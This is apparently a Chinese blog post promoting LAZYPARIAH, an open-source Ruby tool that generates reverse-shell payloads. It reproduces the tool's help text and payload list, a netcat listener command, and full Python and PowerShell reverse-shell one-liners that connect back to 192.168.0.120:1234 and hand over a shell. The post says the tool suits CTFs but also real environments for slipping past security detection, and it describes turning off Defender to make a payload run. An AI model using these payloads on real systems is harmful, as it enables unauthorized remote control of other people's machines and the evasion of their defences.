反弹 SHELL 是什么?其实是建立一个控制目标的简易管道,可以通过这个管道执行系统命令,而建立这个管道有非常多种方式,可以使用多种语言和命令,比如 python、bash、php、ruby 等,然后这些命令又记不住,每次使用都要去搜索或者去看以前的笔记,那么我这么懒,有没有一键生成所需 payload 呢?
今天分享一个开源项目,可以一键搞定 payload,项目地址:
https://github.com/octetsplicer/LAZYPARIAH
主要应用场景是在打 CTF 的时候,方便使用各种反弹 SHELL 的 payload,如果是实际环境,也可以使用这个工具来生成各类反弹 shell payload,用于对抗安全防御系统的检测。
接下来就测试一下这个小工具是否好用,首先在远程服务器监听一个端口,比如 1234:
nc -vv -l -p 1234
服务器地址为 192.168.0.120,使用之前,首先安全必要运行环境:
Ruby >= 2.7.1 (其他版本未经测试)OpenJDK (可选,生成 java_class payload 时使用)GCC (可选: 生成 c_binary payload 时使用)Rust (可选: 生成 rust_binary payloads 时使用)
然后在 bin 目录下有该脚本的源代码,使用 ruby 编写,大概也能看的懂,可以生成的 payload 类型如下:
C binary payloads (compiled on the fly): c_binaryRuby payloads: ruby, ruby_b64, ruby_hex, ruby_cPowershell payloads: powershell_c, powershell_b64Base64-encoded Python payloads: python_b64Rust binary payloads (compiled on the fly): rust_binaryPHP scripts containing base64-encoded Python payloads called via the system() function: php_system_python_b64Java classes (compiled on the fly): java_classPerl payloads: perl, perl_b64, perl_hex, perl_cSimple PHP payloads (targeting specific file descriptors): php_fd, php_fd_c, php_fd_tags
拿到一个陌生的工具,首先要做的就是查看帮助信息:
Usage: lazypariah [OPTIONS] <PAYLOAD TYPE> <ATTACKER HOST> <ATTACKER PORT>Note: <ATTACKER HOST> may be an IPv4 address, IPv6 address or hostname.Example: lazypariah -u python_b64 10.10.14.4 1555Example: lazypariah python_c malicious.local 1337Valid Payloads:awkbash_tcpc_binaryjava_classncnc_openbsdnc_pipenodejsnodejs_b64nodejs_cnodejs_hexperlperl_b64perl_cperl_hexphp_fdphp_fd_cphp_fd_tagsphp_system_python_b64php_system_python_hexphp_system_python_ipv6_b64php_system_python_ipv6_hexpowershell_b64powershell_cpythonpython_b64python_cpython_hexpython_ipv6python_ipv6_b64python_ipv6_cpython_ipv6_hexrubyruby_b64ruby_cruby_hexrust_binarysocatValid Options:-h, --help Display help text and exit.-l, --license Display license information and exit.-u, --url URL-encode the payload.-v, --version Display version information and exit.-D, --fd INTEGER Specify the file descriptor used by the target for TCP. Required for certain payloads.-P, --pv INTEGER Specify Python version for payload. Must be either 2 or 3. By default, no version is specified.-N, --no-new-line Do not append a new-line character to the end of the payload.--b64 Encode a c_binary, rust_binary or java_class payload in base-64.--hex Encode a c_binary, rust_binary or java_class payload in hexadecimal.--gzip Compress a c_binary, rust_binary or java_class payload using zlib.--gzip_b64 Compress a c_binary, rust_binary or java_class payload using zlib and encode the result in base-64.--gzip_hex Compress a c_binary, rust_binary or java_class payload using zlib and encode the result in hexadecimal.
大概看看,就能知道怎么用了,先生成一个 python_c 版的 payload,直接参数中添加服务端 IP 和 端口:
./lazypariah python_c 192.168.0.120 1234
生成了如下的 payload:
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.0.120",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'试试 payload 能不能用:
成功获得 shell,再来试试 powershell 的:
./lazypariah powershell_c 192.168.0.120 1234
生成的 payload 为:
powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('192.168.0.120',1234);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"在服务器监听好端口后,在客户端执行该命令,服务器成功获得 shell:
然而在执行该命令时,被 defander 拦截了,关闭杀软再来一次,就可以了,那么如何免杀就是另外一回事儿了。
除了正常显示 payload 外,还支持各类 payload 的编码处理,比如 base64、hex 等,比如生成 powershell 的 base64 编码的 payload:
关于这个工具的原理,其实也很简单,只不过是把所有可以使用的 payload 进行了集成,然后方便使用,通过命令来生成你想要的任何 payload,而无需进行复制 payload 然后手工替换 IP 和端口,使用起来更方便。
如果你懂一点 ruby,那你可以基于这个工具的思路,编写属于你自己的小工具,以任何形式,剩下如何玩就看你自己了,如果觉得对你没啥用,忽略即可。
如有侵权请联系:admin#unsafe.sh